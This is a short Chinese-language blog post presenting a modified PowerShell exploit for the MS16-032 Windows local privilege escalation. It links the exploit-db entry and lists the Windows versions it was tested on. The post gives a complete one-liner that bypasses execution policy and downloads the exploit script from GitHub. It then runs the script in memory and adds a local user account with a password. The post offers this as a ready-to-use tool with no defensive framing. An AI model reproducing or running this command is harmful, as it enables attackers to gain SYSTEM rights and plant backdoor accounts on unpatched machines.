MS16-032 windows本地提权

exploit-db的详情:
https://www.exploit-db.com/exploits/39574/

试用系统:
Tested on x32 Win7, x64 Win8, x64 2k12R2

提权powershell脚本:

Invoke-MS16-032.ps1

测试详情:

Privilege.gif

为了方便使用,对这个脚本进行了简单的修改,可以执行任意程序,并可以添加参数执行(全程无弹框)脚本地址为:
Invoke-MS16-032.ps1

使用方式如下:
添加用户:
demo.gif

运行某程序:
app.gif

远程加用户:
直接执行如下命令,可进行提权并添加用户:

1
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net user evi1cg test123 /add'"

演示如下:
remote.gif

------本文结束,感谢阅读------